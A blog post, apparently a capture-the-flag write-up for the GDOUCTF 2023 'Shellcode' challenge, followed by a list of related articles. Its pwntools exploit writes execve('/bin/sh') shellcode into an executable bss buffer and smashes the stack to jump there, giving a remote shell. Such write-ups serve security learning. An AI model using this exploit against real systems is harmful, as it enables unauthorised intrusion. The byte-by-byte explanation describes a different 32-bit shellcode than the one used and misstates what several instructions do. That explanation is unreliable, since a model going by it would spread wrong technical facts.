[GDOUCTF 2023]Shellcode

最新推荐文章于 2024-06-15 17:27:28 发布
最新推荐文章于 2024-06-15 17:27:28 发布
阅读量221 收藏 1
点赞数 8
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76466003/article/details/134743880
版权

第一次作shellcode的题

file 64位

checksec

有两个read函数

看一下name

发现在bss段,可执行片段

from pwn import *
p = remote("node4.anna.nssctf.cn",28710)
name_addr= 0x6010a0
shellcode="\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"
Payload = b'a'*(0xa+8)+p64(name_addr)
#向name里面输入shellcode,然后通过栈溢出返回name执行shellcode
#需要注意的是shellcode的大小必须在0x25以内。可以自己手打,可以在shell-storm找,也可以问chatgpt
p.sendlineafter("Please.",shellcode)
p.sendlineafter("start!",Payload)
p.interactive()

shellcode是一个经典的 Linux/x86 的 32 位短字节 Shellcode,用于执行一个系统调用。它的功能是执行一个 execve("/bin/sh", NULL, NULL) 系统调用,以获取一个 shell。

下面是每个字节的含义和作用:

\x6a\x0b :将 0x0b(11)压入栈中,该值是 execve 系统调用号

\x58 :将栈顶元素弹出到 EAX 寄存器中,即将系统调用号加载到 EAX

\x99 :将 EDX 设置为用户态,用于标识字符串的终止符号

\x52 :将 EAX 压入栈中,保存起来

\x68\x2f\x2f\x73\x68 :将字符串 "//sh" 压入栈中,即要执行的程序的路径

\x68\x2f\x62\x69\x6e :将字符串 "/bin" 压入栈中,即要执行的程序所在的目录

\x89\xe3 :将 ESP(栈指针)的值保存到 EBX 中,以备后续使用

\x31\xc9 :将 ECX 设置为零,用于 execve 系统调用的参数

\xcd\x80 :触发系统调用,执行 execve("/bin/sh", NULL, NULL)

这段代码的目的是在内存中放置一个字符串 "/bin/sh",然后调用 execve 系统调用以执行该路径下的 shell 程序。

沈理大学牲
关注
  • 8
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Custom Shellcode
05-16
Custom Shellcode 代码参考.
GDOUCTF2023 Writeup
S4n_v1的博客
04-16 1396
钝角
CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1)
m0_61330806的博客
04-07 583
这个页面按下F5,反汇编为伪代码看到关键函数system()点进去看一下,是不是我们要的那种。双击那个system(a)好极了,就是这个。再来看一下变量command是如何传进去的,左上角箭头,回到历史记录再分析一下程序,用户的输入被存到了变量a中,a经过fun函数后,传入system函数执行,也就是说,command就是a,也就是用户的输入。再双击fun看一下,有没有特殊处理经典的字符串倒置代码,也就是说,它会把你的输入倒过来,即ls->sl ,cat flag->galf tac。
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
[GDOUCTF 2023]Shellcode 全网最详细write up
qq_41937545的博客
11-02 493
64 位 较短的 shellcode -> 23 字节 \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f \x05】​。32 位 短字节 shellcode -> 21 字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80。并且没有后门没有system。
shellcode转unicode工具
06-13
这是一款超级便宜的shellcode转unicode工具,非常好用!
shellcode分析工具.zip
05-25
用来加载shellcode的程序,execsc.exe是cuckoo自带的,sc_test.exe是导师给的。
shellcode.rar
07-12
shellcode ,mfc开发的,可以用于将汇编转成shellcode,可以用于测试服务器漏洞,以及软件补丁!
vbs shellcode转换escape加密
09-06
用vbs转换加密代码
GDOUCTF2023 Crypto Pwn
qq_41626232的博客
04-16 507
比赛用的蠢方法做的,发现x为52位时可以使用small_roots,(这个很好找到上界,没考虑epsilon参数)然后简单爆破2^12=4096解空间。这个用ctypes库加载libc文件,然后随机数就一模一样了,没见过的话,可以看一看,感觉很好用。参数的默认值为0.05,该默认参数下的bound不足以解出本题的小整数解,根据。我做的时候忘记看题目名字了,溢出大小还行,用常规的ret2libc做的。我直接把fake的base64密文全删了,然后就给了一个压缩包出来了。这不是misc题吗?
[GDOUCTF 2023] crypto pwn 部分
weixin_52640415的博客
04-17 818
GDOUCTF 2023 crypto,pwn
百度网盘限速解决办法
生活在别处
06-13 3601
比如可以获取下载直链后,使用IDM(Internet Download Manager)对该直链进行多线程下载,但是并不会有实际速率提升效果,因为百度网盘在服务器端进行了限速,多线程的速率总和被限制在了100KB/s左右。(现在虽然是所谓玩游戏获得会员下载体验,实际上点击后会在百度网盘内打开一个web游戏,并不需要游玩游戏,直接等待会员下载体验时间结束即可关闭web游戏窗口)所以,客户端这些改动伎俩通通没有实际效果,即使在客户端显示无限速、显示会员体验,都只是自欺欺人而已。
服务器远程桌面经常连接不上,造成远程桌面连接不上的原因都有哪些
最新发布
day3ZY的博客
06-15 403
防火墙和安全软件在保护服务器免受恶意攻击的同时,也可能误判正常的远程连接请求,导致连接被阻止。例如,如果远程桌面服务未启用,或者远程桌面端口被占用或配置错误,都可能导致连接失败。此外,如果服务器上安装了安全类软件,且未正确配置以允许远程桌面连接,也可能导致连接问题。例如,服务器可能遭受DDOS攻击,导致流量超出防御峰值,IP被封锁,进而无法远程连接。服务器远程桌面连接不稳定或经常连接不上是一个较为常见的技术问题,其可能的原因涉及多个层面,包括网络设置、服务器配置、系统安全等方面。
DELL服务器插入新磁盘、创建虚拟磁盘、挂载磁盘步骤
Clang’s Blog
06-15 527
分区磁盘 sudo fdisk /dev/sdb # 格式化分区 sudo mkfs.ext4 /dev/sdb1 # 创建挂载点 sudo mkdir /mnt/newdisk # 挂载分区 sudo mount /dev/sdb1 /mnt/newdisk # 编辑 fstab 以实现持久挂载 sudo nano /etc/fstab这样就可以将新磁盘(sdb)挂载到,并且每次重启后它都会自动挂载在那里。
计算机网络(6) ICMP协议
qq_42761215的博客
06-14 410
ICMP是网络通信中不可或缺的协议,虽然不传输用户数据,但在网络管理和诊断中起着重要作用。理解ICMP及其各种消息类型对于网络管理员和工程师来说是至关重要的,它有助于维护网络的正常运行和性能优化。
服务器权限管理
2302_80643218的博客
06-15 341
我们linux服务器上有严格的权限等级,如果权限过高导致误操作会增加服务器的风险。所以对于了解linux系统中的各种权限及要给用户,服务等分配合理的权限十分重要。(权限越大,责任越大)
Linux 常用命令 - userdel 【删除用户】
随便转转
06-12 130
userdel 这个命令源自于 “user delete”,即用户删除。这个命令主要用于在 Linux 系统中删除用户账户及其相关文件。当管理员需要移除一个用户及其在系统中的所有踪迹时,会用到这个命令。
shellcode downloader
01-08
Shellcode downloader(壳代码下载器)是一种恶意软件的一部分,用于在受感染的系统上下载和执行恶意shellcode。它通常由黑客或攻击者利用系统的弱点,如漏洞或错误配置,将其注入到受感染系统的进程中。 Shellcode downloader的主要目的是在感染的系统上建立一个后门,以便攻击者能够以后访问并对系统进行进一步的攻击。通过下载和执行远程恶意shellcode,攻击者可以获取系统上的敏感信息、执行远程命令、安装其他恶意软件以及执行各种潜在攻击。 Shellcode downloader通常通过各种方式传播,比如利用社交工程、垃圾邮件、恶意网站或网络钓鱼攻击等。一旦感染了一个系统,shellcode downloader将执行以下一些步骤: 1. 首先,shellcode downloader会与其指定的远程服务器建立连接,以获取后续恶意代码的位置和执行指令。 2. 下载恶意的shellcode文件到受感染系统中,并将其写入指定的文件或内存位置。 3. 执行shellcode,使其在系统的特定进程中运行。shellcode的目标是通过利用系统或应用程序的弱点来获取系统权限并执行恶意操作。 4. 一旦shellcode成功运行,它可能会执行许多不同的操作,比如建立远程访问通道、搜集系统信息、窃取敏感信息或执行其他攻击。 为了保护系统免受shellcode downloader的入侵,用户应该始终注意不点击垃圾邮件或未知来源的链接,并保持系统和应用程序的更新,以修复任何发现的漏洞。此外,安装有效的防病毒和防火墙软件也是防止shellcode downloader侵入的关键步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值